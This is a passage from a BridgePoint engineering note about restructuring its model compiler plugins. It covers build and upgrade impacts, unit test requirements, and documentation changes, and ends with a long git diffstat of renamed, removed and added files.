identifiers introduced by this work. Therefore,\nBridgePoint must be built with this version of BridgePoint or later. The build\nserver will need to be updated once this work is promoted. <<dr-3>> is raised to\ntrack this upgrade.\n\nThe model compiler projects (MASL tools, docgen, mcmc, etc) have also been\nupgraded to be compatible with this version of BridgePoint. \n\nThe `MicrowaveOven` and `GPS_Watch` projects included with BridgePoint in the\nwelcome plugin will no longer build. <<dr-4>> is raised to track the upgrade of\nthose projects.\n\nOther projects in the `models` repository will need to be upgraded, however this\ncan be done at a later time as needed.\n\n== 6 Unit Test\n\n6.1 Current unit test suite shall pass.\n\n6.1.1 Existing unit tests that are deprecated by this work shall be removed.\n\n6.1.2 Existing unit tests that are still valid but broken by this work shall be\nrepaired.\n\n== 7 User Documentation\n\n7.1 Project preferences\n\nReferences to the project preferences menu item in the documentation have been\nupdated to correctly refer to the \"Properties\" menu. Changes were made in the\n\"Preferences\" documentation, the \"MASL Modeling and Conversion Guide\" page, and\nthe \"BridgePoint Context Menu Tools\" page.\n\n7.2 CME menus\n\nIn addition to the project preferences the following changes have been made to\nthe \"BridgePoint Context Menu Tools\" page.\n\n7.2.1 Create Documenatation has been removed\n\n7.2.2 Set Model Compiler has been changed to \"Set Model Compilers\" and the\ndescription has been updated\n\n== 8 Code Changes\n\n- fork\/repository: leviathan747\/bridgepoint\n- branch: 11491_mcs\n\n----\n doc-bridgepoint\/notes\/11491_mcs\/11491_mcs_int.adoc | 417 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n doc-bridgepoint\/notes\/11491_mcs\/docgen_prefs.png | Bin 0 -> 126365 bytes\n doc-bridgepoint\/notes\/11491_mcs\/mc3020_prefs.png | Bin 0 -> 112433 bytes\n doc-bridgepoint\/notes\/11491_mcs\/mcs.png | Bin 0 -> 94619 bytes\n doc-bridgepoint\/notes\/11491_mcs\/new_mc3020_project.png | Bin 0 -> 86537 bytes\n doc-bridgepoint\/notes\/11491_mcs\/project_prefs.png | Bin 0 -> 136695 bytes\n doc-bridgepoint\/notes\/11491_mcs\/properties_cme.png | Bin 0 -> 220452 bytes\n doc-bridgepoint\/process\/FAQ.md | 12 ++++\n doc-bridgepoint\/process\/templates\/launch_configs\/Core Test (OSX) CLIish.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Core Test (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Core Test - Consistency (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Core Test - Consistency.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Core Test - Existing Projects (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Core Test - Existing Projects.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Core Test - RTO Move (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Core Test - RTO Move.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Core Test - System Level Tests (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Core Test - System Level Tests.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Core Test - Workspace Setup (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Core Test - Workspace Setup.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Core Test 2 (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Core Test 2.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Core Test CLIish.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Core Test.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Debug - Verifier Test (OSX) CLIish.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Debug - Verifier Test (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Debug - Verifier Test 2 (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Debug - Verifier Test 2.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Debug - Verifier Test CLIish.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Debug - Verifier Test.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/IO MDL PkgCM Tests (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/IO MDL PkgCM Tests.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/IO MDL Tests (OSX) CLIish.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/IO MDL Tests (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/IO MDL Tests 2 (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/IO MDL Tests 2.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/IO MDL Tests CLIish.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/IO MDL Tests.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/IO SQL Test.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Model Compare Test (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Model Compare Test.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/OAL Content Assist Test (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/OAL Content Assist Test.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Open Declarations Test (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Open Declarations Test.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Parse All Test (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Parse All Test.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Search Test (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Search Test.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/TestVisibilityInElementChooser (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/TestVisibilityInElementChooser.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/UI Canvas CCP Test (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/UI Canvas CCP Test.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/UI Canvas Suite (OSX) CLIish.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/UI Canvas Suite 1 (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/UI Canvas Suite 1.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/UI Canvas Suite 2 (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/UI Canvas Suite 2.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/UI Canvas Suite 3 (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/UI Canvas Suite 3.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/UI Canvas Suite CLIish.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/UI Explorer Test (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/UI Explorer Test.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/UI Properties Test (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/UI Properties Test.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/UI Text Test (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/UI Text Test.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Welcome Test (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Welcome Test.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Xtext MASL DeclarationTypeProviderTest (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Xtext MASL DeclarationTypeProviderTest.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Xtext MASL ExampleModelsIntegrationTest (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Xtext MASL ExampleModelsIntegrationTest.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Xtext MASL LexerTest (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Xtext MASL LexerTest.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Xtext MASL LibraryTest (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Xtext MASL LibraryTest.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Xtext MASL LinkingTest (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Xtext MASL LinkingTest.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Xtext MASL PrimitiveTypesTest (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Xtext MASL PrimitiveTypesTest.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Xtext MASL SyntacticPredicateTest (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Xtext MASL SyntacticPredicateTest.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Xtext MASL TypeConformanceTest (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Xtext MASL TypeConformanceTest.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Xtext MASL TypeProviderTest (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Xtext MASL TypeProviderTest.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Xtext MASL ValidatorTest (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Xtext MASL ValidatorTest.launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Xtext MASL ValueConverterTest (OSX).launch | 2 +-\n doc-bridgepoint\/process\/templates\/launch_configs\/Xtext MASL ValueConverterTest.launch | 2 +-\n doc-bridgepoint\/review-minutes\/11491_mcs_rvm.adoc | 26 ++++++++\n releng\/org.xtuml.bp.releng.parent.tests\/pom.xml | 1 -\n releng\/org.xtuml.bp.releng.parent\/pom.xml | 11 +---\n src\/installer\/build_installer_bp.sh | 12 ++--\n src\/org.xtuml.bp.als\/.project | 3 +-\n src\/org.xtuml.bp.cdt\/.gitignore | 1 -\n src\/org.xtuml.bp.cdt\/.settings\/org.eclipse.jdt.core.prefs | 7 --\n src\/org.xtuml.bp.cdt\/META-INF\/MANIFEST.MF | 20 ------\n src\/org.xtuml.bp.cdt\/build.properties | 8 ---\n src\/org.xtuml.bp.cdt\/generate.xml | 33 ----------\n src\/org.xtuml.bp.cdt\/icons\/newsystem.gif | Bin 325 -> 0 bytes\n src\/org.xtuml.bp.cdt\/plugin.xml | 7 --\n src\/org.xtuml.bp.cdt\/pom.xml | 47 --------------\n src\/org.xtuml.bp.cdt\/src\/org\/xtuml\/bp\/cdt\/Activator.java | 71 ---------------------\n src\/org.xtuml.bp.cdt\/src\/org\/xtuml\/bp\/cdt\/wizards\/BridgePointCDTProjectWizard.java | 162 ----------------------------------------------\n src\/org.xtuml.bp.cli\/META-INF\/MANIFEST.MF | 5 +-\n src\/org.xtuml.bp.cli\/src\/org\/xtuml\/bp\/cli\/BuildExecutor.java | 490 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++-----------------------------------------------------------------------\n src\/org.xtuml.bp.core\/.project | 3 +-\n src\/org.xtuml.bp.core\/arc\/create_core_plugin.inc | 55 ++++++++++++----\n src\/org.xtuml.bp.core\/generate.xml | 4 +-\n src\/org.xtuml.bp.core\/schema\/code-builders.exsd | 51 ---------------\n src\/org.xtuml.bp.core\/schema\/model-compilers.exsd | 72 ++++++++-------------\n src\/org.xtuml.bp.core\/src\/org\/xtuml\/bp\/core\/common\/NonRootModelElement.java | 6 +-\n src\/org.xtuml.bp.core\/src\/org\/xtuml\/bp\/core\/ui\/DelegatingWizard.java | 429 ++++++++++++++++++++++++++++++++++++++++++--------------------------------------------------------------------------------\n src\/org.xtuml.bp.core\/src\/org\/xtuml\/bp\/core\/ui\/IDelegateWizard.java | 9 +++\n src\/org.xtuml.bp.core\/src\/org\/xtuml\/bp\/core\/ui\/ModelCompilerChooserPage.java | 199 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n src\/org.xtuml.bp.core\/src\/org\/xtuml\/bp\/core\/ui\/NewSystemWizard.java | 395 ++++++++++++++++++++++++++++++++++++++++++++++++++--------------------------------------------------------------\n src\/org.xtuml.bp.core\/src\/org\/xtuml\/bp\/core\/ui\/SetBPProjectPreferencesAction.java | 77 ----------------------\n src\/org.xtuml.bp.core\/src\/org\/xtuml\/bp\/core\/ui\/WizardDelegate.java | 386 --------------------------------------------------------------------------------------------------------------\n src\/org.xtuml.bp.core\/src\/org\/xtuml\/bp\/core\/ui\/WizardDelegateChooserPage.java | 138 ---------------------------------------\n src\/org.xtuml.bp.core\/src\/org\/xtuml\/bp\/core\/ui\/WizardNewSystemCreationPage.java | 129 ++++++++++++++++---------------------\n src\/org.xtuml.bp.core\/src\/org\/xtuml\/bp\/core\/ui\/preferences\/BridgePointProjectActionLanguagePreferencesPage.java | 54 ++++++++++++++++\n src\/org.xtuml.bp.core\/src\/org\/xtuml\/bp\/core\/ui\/preferences\/BridgePointProjectDependenciesPreferencesPage.java | 54 ++++++++++++++++\n src\/org.xtuml.bp.core\/src\/org\/xtuml\/bp\/core\/ui\/preferences\/BridgePointProjectPreferencesPage.java | 21 ++++++\n src\/org.xtuml.bp.core\/src\/org\/xtuml\/bp\/core\/ui\/preferences\/BridgePointProjectReferencesPreferencesPage.java | 54 ++++++++++++++++\n src\/org.xtuml.bp.doc\/Reference\/MASL\/MASLConversionGuide\/MASLConversionGuide.adoc | 6 +-\n src\/org.xtuml.bp.doc\/Reference\/MASL\/MASLConversionGuide\/MASLConversionGuide.html | 10 +--\n src\/org.xtuml.bp.doc\/Reference\/MASL\/MASLConversionGuide\/images\/image01.png | Bin 75163 -> 107356 bytes\n src\/org.xtuml.bp.doc\/Reference\/UserInterface\/BridgePointContextMenuTools\/BridgePointContextMenuTools.html | 20 +++---\n src\/org.xtuml.bp.doc\/Reference\/UserInterface\/BridgePointContextMenuTools\/BridgePointContextMenuTools.md | 5 +-\n src\/org.xtuml.bp.doc\/Reference\/UserInterface\/BridgePointContextMenuTools\/me_menu.png | Bin 386604 -> 934462 bytes\n src\/org.xtuml.bp.doc\/Reference\/UserInterface\/BridgePointContextMenuTools\/utilities_menu.png | Bin 360408 -> 723312 bytes\n src\/org.xtuml.bp.doc\/Reference\/UserInterface\/xtUMLModeling\/Preferences\/Preferences.html | 1 +\n src\/org.xtuml.bp.doc\/Reference\/UserInterface\/xtUMLModeling\/Preferences\/Preferences.md | 2 +\n src\/org.xtuml.bp.doc\/Reference\/UserInterface\/xtUMLModeling\/Preferences\/ProjActionLanguage.png | Bin 55725 -> 98550 bytes\n src\/org.xtuml.bp.doc\/Reference\/UserInterface\/xtUMLModeling\/Preferences\/ProjDependencies.png | Bin 81965 -> 147553 bytes\n src\/org.xtuml.bp.doc\/Reference\/UserInterface\/xtUMLModeling\/Preferences\/ProjIPR.png | Bin 66756 -> 105611 bytes\n src\/org.xtuml.bp.doc\/Reference\/UserInterface\/xtUMLModeling\/Preferences\/ProjectPreferencesCME.png | Bin 36606 -> 343649 bytes\n src\/org.xtuml.bp.docgen\/.classpath | 7 --\n src\/org.xtuml.bp.docgen\/META-INF\/MANIFEST.MF | 32 ----------\n src\/org.xtuml.bp.docgen\/plugin.xml | 33 ----------\n src\/org.xtuml.bp.docgen\/src\/org\/xtuml\/bp\/docgen\/DocGenPlugin.java | 79 -----------------------\n src\/org.xtuml.bp.docgen\/src\/org\/xtuml\/bp\/docgen\/actions\/makeDocumentationAction.java | 49 --------------\n src\/org.xtuml.bp.docgen\/src\/org\/xtuml\/bp\/docgen\/ant\/tasks\/DocGenTask.java | 75 ----------------------\n src\/org.xtuml.bp.docgen\/src\/org\/xtuml\/bp\/docgen\/generator\/Generator.java | 591 ------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n src\/org.xtuml.bp.internal.tools\/src\/org\/xtuml\/bp\/internal\/tools\/mcjava\/Activator.java | 1 -\n src\/org.xtuml.bp.io.image\/src\/org\/xtuml\/bp\/io\/image\/generator\/Generator.java | 333 ++++++++++++++++++++++++++++++++++++++++++++++-------------------------------------------------\n src\/org.xtuml.bp.mc.c.source\/.project | 48 --------------\n src\/org.xtuml.bp.mc.c.source\/.settings\/org.eclipse.jdt.core.prefs | 7 --\n src\/org.xtuml.bp.mc.c.source\/build.properties | 14 ----\n src\/org.xtuml.bp.mc.c.source\/build_settings\/build_setting.properties | 9 ---\n src\/org.xtuml.bp.mc.c.source\/defaults\/launch_specification\/Model Compiler.launch | 11 ----\n src\/org.xtuml.bp.mc.c.source\/generate.xml | 29 ---------\n src\/org.xtuml.bp.mc.c.source\/plugin.xml | 75 ----------------------\n src\/org.xtuml.bp.mc.c.source\/src\/org\/xtuml\/bp\/mc\/c\/source\/ExportBuilder.java | 25 --------\n src\/org.xtuml.bp.mc.c.source\/src\/org\/xtuml\/bp\/mc\/c\/source\/MCNature.java | 50 ---------------\n src\/org.xtuml.bp.mc.c.source\/src\/org\/xtuml\/bp\/mc\/c\/source\/MCNewProjectWizard.java | 63 ------------------\n src\/org.xtuml.bp.mc.cpp.source\/.externalToolBuilders\/Build.launch | 15 -----\n src\/org.xtuml.bp.mc.cpp.source\/.externalToolBuilders\/Clean.launch | 10 ---\n src\/org.xtuml.bp.mc.cpp.source\/.gitignore | 2 -\n src\/org.xtuml.bp.mc.cpp.source\/.project | 48 --------------\n src\/org.xtuml.bp.mc.cpp.source\/META-INF\/MANIFEST.MF | 24 -------\n src\/org.xtuml.bp.mc.cpp.source\/about.html | 36 -----------\n src\/org.xtuml.bp.mc.cpp.source\/build.properties | 13 ----\n src\/org.xtuml.bp.mc.cpp.source\/build_settings\/build_setting.properties | 9 ---\n src\/org.xtuml.bp.mc.cpp.source\/defaults\/launch_specification\/Model Compiler.launch | 11 ----\n src\/org.xtuml.bp.mc.cpp.source\/generate.xml | 29 ---------\n src\/org.xtuml.bp.mc.cpp.source\/plugin.xml | 53 ---------------\n src\/org.xtuml.bp.mc.cpp.source\/pom.xml | 47 --------------\n src\/org.xtuml.bp.mc.cpp.source\/src\/org\/xtuml\/bp\/mc\/cpp\/source\/Activator.java | 68 --------------------\n src\/org.xtuml.bp.mc.cpp.source\/src\/org\/xtuml\/bp\/mc\/cpp\/source\/ExportBuilder.java | 25 --------\n src\/org.xtuml.bp.mc.cpp.source\/src\/org\/xtuml\/bp\/mc\/cpp\/source\/MCNature.java | 50 ---------------\n src\/org.xtuml.bp.mc.cpp.source\/src\/org\/xtuml\/bp\/mc\/cpp\/source\/MCNewProjectWizard.java | 63 ------------------\n src\/{org.xtuml.bp.cdt => org.xtuml.bp.mc.docgen}\/.classpath | 0\n src\/{org.xtuml.bp.cdt => org.xtuml.bp.mc.docgen}\/.externalToolBuilders\/Build.launch | 0\n src\/{org.xtuml.bp.cdt => org.xtuml.bp.mc.docgen}\/.externalToolBuilders\/Clean.launch | 0\n src\/{org.xtuml.bp.docgen => org.xtuml.bp.mc.docgen}\/.gitignore | 2 +-\n src\/{org.xtuml.bp.cdt => org.xtuml.bp.mc.docgen}\/.project | 96 ++++++++++++++--------------\n src\/{org.xtuml.bp.mc.none => org.xtuml.bp.mc.docgen}\/.settings\/org.eclipse.jdt.core.prefs | 6 +-\n src\/org.xtuml.bp.mc.docgen\/META-INF\/MANIFEST.MF | 21 ++++++\n src\/{org.xtuml.bp.cdt => org.xtuml.bp.mc.docgen}\/about.html | 0\n src\/{org.xtuml.bp.docgen => org.xtuml.bp.mc.docgen}\/build.properties | 9 +--\n src\/{org.xtuml.bp.mc.template => org.xtuml.bp.mc.docgen}\/generate.xml | 2 +-\n src\/org.xtuml.bp.mc.docgen\/plugin.xml | 50 +++++++++++++++\n src\/{org.xtuml.bp.mc.c.source => org.xtuml.bp.mc.docgen}\/pom.xml | 2 +-\n src\/org.xtuml.bp.mc.docgen\/src\/org\/xtuml\/bp\/mc\/docgen\/Activator.java | 64 +++++++++++++++++++\n src\/org.xtuml.bp.mc.docgen\/src\/org\/xtuml\/bp\/mc\/docgen\/DocgenBuilder.java | 300 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n src\/org.xtuml.bp.mc.docgen\/src\/org\/xtuml\/bp\/mc\/docgen\/DocgenNature.java | 48 ++++++++++++++\n src\/org.xtuml.bp.mc.docgen\/src\/org\/xtuml\/bp\/mc\/docgen\/DocgenSetupWizard.java | 43 +++++++++++++\n src\/org.xtuml.bp.mc.docgen\/src\/org\/xtuml\/bp\/mc\/docgen\/preferences\/DocgenPreferencePage.java | 124 ++++++++++++++++++++++++++++++++++++\n src\/org.xtuml.bp.mc.docgen\/src\/org\/xtuml\/bp\/mc\/docgen\/preferences\/DocgenPreferences.java | 82 ++++++++++++++++++++++++\n src\/org.xtuml.bp.mc.java.source\/.classpath | 7 --\n src\/org.xtuml.bp.mc.java.source\/.externalToolBuilders\/Build.launch | 15 -----\n src\/org.xtuml.bp.mc.java.source\/.externalToolBuilders\/Clean.launch | 10 ---\n src\/org.xtuml.bp.mc.java.source\/about.html | 36 -----------\n src\/org.xtuml.bp.mc.java.source\/build.properties | 13 ----\n src\/org.xtuml.bp.mc.java.source\/build_settings\/build_setting.properties | 9 ---\n src\/org.xtuml.bp.mc.java.source\/defaults\/launch_specification\/Model Compiler.launch | 11 ----\n src\/org.xtuml.bp.mc.java.source\/generate.xml | 29 ---------\n src\/org.xtuml.bp.mc.java.source\/plugin.xml | 44 -------------\n src\/org.xtuml.bp.mc.java.source\/pom.xml | 47 --------------\n src\/org.xtuml.bp.mc.java.source\/src\/org\/xtuml\/bp\/mc\/java\/source\/Activator.java | 68 --------------------\n src\/org.xtuml.bp.mc.java.source\/src\/org\/xtuml\/bp\/mc\/java\/source\/ExportBuilder.java | 403 ------------------------------------------------------------------------------------------------------------------\n src\/org.xtuml.bp.mc.java.source\/src\/org\/xtuml\/bp\/mc\/java\/source\/MCNature.java | 49 --------------\n src\/org.xtuml.bp.mc.java.source\/src\/org\/xtuml\/bp\/mc\/java\/source\/MCNewProjectWizard.java | 67 -------------------\n src\/org.xtuml.bp.mc.java.source\/src\/org\/xtuml\/bp\/mc\/java\/source\/SingleQuoteFilterOutputStream.java | 54 ----------------\n src\/{org.xtuml.bp.mc.c.source => org.xtuml.bp.mc.java}\/.classpath | 0\n src\/{org.xtuml.bp.docgen => org.xtuml.bp.mc.java}\/.externalToolBuilders\/Build.launch | 0\n src\/{org.xtuml.bp.docgen => org.xtuml.bp.mc.java}\/.externalToolBuilders\/Clean.launch | 0\n src\/{org.xtuml.bp.mc.java.source => org.xtuml.bp.mc.java}\/.gitignore | 0\n src\/{org.xtuml.bp.mc.java.source => org.xtuml.bp.mc.java}\/.project | 2 +-\n src\/{org.xtuml.bp.mc.java.source => org.xtuml.bp.mc.java}\/.settings\/org.eclipse.jdt.core.prefs | 6 +-\n src\/{org.xtuml.bp.mc.java.source => org.xtuml.bp.mc.java}\/META-INF\/MANIFEST.MF | 10 ++-\n src\/{org.xtuml.bp.docgen => org.xtuml.bp.mc.java}\/about.html | 0\n src\/org.xtuml.bp.mc.java\/build.properties | 7 ++\n src\/{org.xtuml.bp.mc.none => org.xtuml.bp.mc.java}\/generate.xml | 2 +-\n src\/org.xtuml.bp.mc.java\/plugin.xml | 40 ++++++++++++\n src\/{org.xtuml.bp.docgen => org.xtuml.bp.mc.java}\/pom.xml | 3 +-\n src\/{org.xtuml.bp.mc.c.source\/src\/org\/xtuml\/bp\/mc\/c\/source => org.xtuml.bp.mc.java\/src\/org\/xtuml\/bp\/mc\/java}\/Activator.java | 5 +-\n src\/org.xtuml.bp.mc.java\/src\/org\/xtuml\/bp\/mc\/java\/McJavaBuilder.java | 359 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n src\/org.xtuml.bp.mc.java\/src\/org\/xtuml\/bp\/mc\/java\/McJavaNature.java | 54 ++++++++++++++++\n src\/org.xtuml.bp.mc.java\/src\/org\/xtuml\/bp\/mc\/java\/McJavaSetupWizard.java | 43 +++++++++++++\n src\/org.xtuml.bp.mc.java\/src\/org\/xtuml\/bp\/mc\/java\/SingleQuoteFilterOutputStream.java | 54 ++++++++++++++++\n src\/org.xtuml.bp.mc.masl\/.gitignore | 2 +-\n src\/org.xtuml.bp.mc.masl\/build.properties | 7 +-\n src\/org.xtuml.bp.mc.masl\/build_settings\/build_setting.properties | 9 ---\n src\/org.xtuml.bp.mc.masl\/plugin.xml | 42 +++++++-----\n src\/org.xtuml.bp.mc.masl\/src\/org\/xtuml\/bp\/mc\/masl\/Activator.java | 1 -\n src\/org.xtuml.bp.mc.masl\/src\/org\/xtuml\/bp\/mc\/masl\/MASLEditorPartListener.java | 2 +-\n src\/org.xtuml.bp.mc.masl\/src\/org\/xtuml\/bp\/mc\/masl\/MCNewProjectWizard.java | 49 --------------\n src\/org.xtuml.bp.mc.masl\/src\/org\/xtuml\/bp\/mc\/masl\/MaslExportBuilder.java | 57 +++--------------\n src\/org.xtuml.bp.mc.masl\/src\/org\/xtuml\/bp\/mc\/masl\/{MCNature.java => MaslExportNature.java} | 26 ++++----\n src\/org.xtuml.bp.mc.masl\/src\/org\/xtuml\/bp\/mc\/masl\/MaslExportSetupWizard.java | 43 +++++++++++++\n src\/{org.xtuml.bp.mc.cpp.source => org.xtuml.bp.mc.mc3020}\/.classpath | 0\n src\/{org.xtuml.bp.mc.c.source => org.xtuml.bp.mc.mc3020}\/.externalToolBuilders\/Build.launch | 0\n src\/{org.xtuml.bp.mc.c.source => org.xtuml.bp.mc.mc3020}\/.externalToolBuilders\/Clean.launch | 0\n src\/{org.xtuml.bp.mc.c.source => org.xtuml.bp.mc.mc3020}\/.gitignore | 0\n src\/{org.xtuml.bp.docgen => org.xtuml.bp.mc.mc3020}\/.project | 2 +-\n src\/{org.xtuml.bp.mc.cpp.source => org.xtuml.bp.mc.mc3020}\/.settings\/org.eclipse.jdt.core.prefs | 6 +-\n src\/{org.xtuml.bp.mc.c.source => org.xtuml.bp.mc.mc3020}\/META-INF\/MANIFEST.MF | 11 ++--\n src\/{org.xtuml.bp.mc.c.source => org.xtuml.bp.mc.mc3020}\/about.html | 0\n src\/org.xtuml.bp.mc.mc3020\/build.properties | 7 ++\n src\/{org.xtuml.bp.docgen => org.xtuml.bp.mc.mc3020}\/generate.xml | 4 +-\n src\/org.xtuml.bp.mc.mc3020\/plugin.xml | 53 +++++++++++++++\n src\/{org.xtuml.bp.mc.none => org.xtuml.bp.mc.mc3020}\/pom.xml | 2 +-\n src\/org.xtuml.bp.mc.mc3020\/src\/org\/xtuml\/bp\/mc\/mc3020\/Activator.java | 64 +++++++++++++++++++\n src\/org.xtuml.bp.mc.mc3020\/src\/org\/xtuml\/bp\/mc\/mc3020\/Mc3020Builder.java | 101 +++++++++++++++++++++++++++++\n src\/org.xtuml.bp.mc.mc3020\/src\/org\/xtuml\/bp\/mc\/mc3020\/Mc3020Nature.java | 59 +++++++++++++++++\n src\/org.xtuml.bp.mc.mc3020\/src\/org\/xtuml\/bp\/mc\/mc3020\/Mc3020SetupWizard.java | 91 ++++++++++++++++++++++++++\n src\/org.xtuml.bp.mc.mc3020\/src\/org\/xtuml\/bp\/mc\/mc3020\/preferences\/Mc3020PreferenceControl.java | 119 ++++++++++++++++++++++++++++++++++\n src\/org.xtuml.bp.mc.mc3020\/src\/org\/xtuml\/bp\/mc\/mc3020\/preferences\/Mc3020PreferencePage.java | 45 +++++++++++++\n src\/org.xtuml.bp.mc.mc3020\/src\/org\/xtuml\/bp\/mc\/mc3020\/preferences\/Mc3020Preferences.java | 79 +++++++++++++++++++++++\n src\/org.xtuml.bp.mc.mc3020\/src\/org\/xtuml\/bp\/mc\/mc3020\/util\/CDTUtil.java | 217 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n src\/org.xtuml.bp.mc.none\/.classpath | 7 --\n src\/org.xtuml.bp.mc.none\/.externalToolBuilders\/Build.launch | 15 -----\n src\/org.xtuml.bp.mc.none\/.externalToolBuilders\/Clean.launch | 10 ---\n src\/org.xtuml.bp.mc.none\/.gitignore | 2 -\n src\/org.xtuml.bp.mc.none\/.project | 48 --------------\n src\/org.xtuml.bp.mc.none\/META-INF\/MANIFEST.MF | 24 -------\n src\/org.xtuml.bp.mc.none\/about.html | 36 -----------\n src\/org.xtuml.bp.mc.none\/build.properties | 8 ---\n src\/org.xtuml.bp.mc.none\/plugin.xml | 57 -----------------\n src\/org.xtuml.bp.mc.none\/src\/org\/xtuml\/bp\/mc\/none\/Activator.java | 72 ---------------------\n src\/org.xtuml.bp.mc.none\/src\/org\/xtuml\/bp\/mc\/none\/ExportBuilder.java | 34 ----------\n src\/org.xtuml.bp.mc.none\/src\/org\/xtuml\/bp\/mc\/none\/MCNature.java | 63 ------------------\n src\/org.xtuml.bp.mc.none\/src\/org\/xtuml\/bp\/mc\/none\/MCNewProjectWizard.java | 57 -----------------\n src\/org.xtuml.bp.mc.systemc.source\/.classpath | 7 --\n 